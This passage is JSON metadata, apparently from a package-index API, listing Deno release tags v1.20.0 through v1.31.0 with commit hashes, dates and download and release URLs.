45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/